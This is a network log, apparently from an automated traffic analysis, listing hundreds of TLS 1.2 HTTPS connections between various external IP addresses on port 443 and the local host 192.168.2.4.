Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:58092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:58376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:58375 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:58227 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:58084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:58091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:58112 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:58207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:58173 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:58374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:58421 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:58653 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:58684 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:58930 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:58462 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:58881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:58897 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:58848 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:58761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:58740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:59748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:59753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:59690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:59735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59949 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:59691 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:59950 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:59954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:59774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.11:443 -> 192.168.2.4:60016 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:59942 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:60008 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:60073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:59993 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:59840 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:60019 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:60287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:60030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:60021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:60288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:60052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:59989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:60140 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:60415 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:60031 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:60289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:60633 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:60629 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:60622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:60835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:60811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:60810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:60704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:60737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:61651 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:61770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:61744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:61604 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:61613 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:61650 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:61660 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:61608 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:61704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:61621 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:61639 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:61598 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:61635 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:61633 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:61636 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:61620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:61640 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:61622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:61913 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:61830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:61883 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:62180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:61944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:61943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:62480 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:62477 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:62478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:62485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:61828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:62479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:61938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:62409 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62657 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:62748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:62809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:62702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62885 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:62881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:62828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:62834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:62753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:62910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:62749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62902 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62840 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:62843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:62841 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:62886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:62844 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:63214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:62908 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:62925 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:62944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:62909 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:62806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:62924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:62923 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:62915 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:62918 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:63558 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:62884 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:63278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:63481 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:63476 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:63562 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:63517 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:63568 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:63533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:63567 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:63585 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:63587 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:63583 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:63732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:63590 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:63586 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:62899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:64149 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64232 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:64335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:64233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:64236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:64473 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:64387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:64311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:64102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:64229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:64237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:64234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:64372 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:64304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:64220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64228 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:64225 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:64388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:64334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:64308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:65151 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:64895 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:65122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:64705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:65065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:65067 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:65072 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:65117 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:65200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:65206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:65203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:65482 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:65374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:65302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:65068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:65483 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:65301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:65271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:49164 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:65493 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:49517 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49519 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:65467 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:49461 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:49413 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:49479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:49504 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:49454 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:49508 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:49452 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49681 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:50255 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:50666 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:50463 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:50469 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:50818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:50826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:50488 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:50493 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:50718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:50821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:50822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:50264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:51203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:51115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:51330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:51276 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:51315 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:51181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:51105 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:51350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:51189 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:51448 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:51277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:51574 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:51106 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:51380 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:51602 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:51428 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:51540 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:51701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:51798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:51381 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:51799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:51382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:51755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:51505 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:52052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:51334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:51693 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:52241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:52165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:52329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:52252 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:52420 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:52337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:52426 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:52390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:52454 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:52453 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:52494 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:52552 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:52534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:52460 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:52478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:52952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:52662 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:52720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:52696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:52666 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:53143 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:53083 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:53186 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:53071 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:53236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:52730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53147 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53145 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:53224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:53167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:53290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:55752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:55748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:55749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:55727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56103 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56109 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:56108 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:56066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56118 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56209 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56197 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56222 version: TLS 1.2
